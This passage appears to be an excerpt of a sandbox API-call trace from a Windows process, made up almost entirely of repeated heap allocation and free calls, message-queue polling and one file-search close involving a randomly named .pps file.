ftLastWriteTime.dwLowDateTime=0xb8d15b70, ftLastWriteTime.dwHighDateTime=0x1d5e1eb, nFileSizeHigh=0x0, nFileSizeLow=0xae64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zftDypyr-e.pps", cAlternateFileName="ZFTDYP~1.PPS")) returned 0 [0231.668] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0231.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0231.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5498 | out: hHeap=0x630000) returned 1 [0231.668] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0231.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0231.668] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0231.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0231.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0231.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0231.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0231.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0231.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0231.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0231.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0231.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0231.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0231.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0231.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0231.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0231.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0231.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0231.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0231.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0231.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0231.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0231.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0231.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0231.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0231.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0231.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0231.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0231.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0231.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0231.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0231.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0231.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0231.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.679] HeapFree (in: 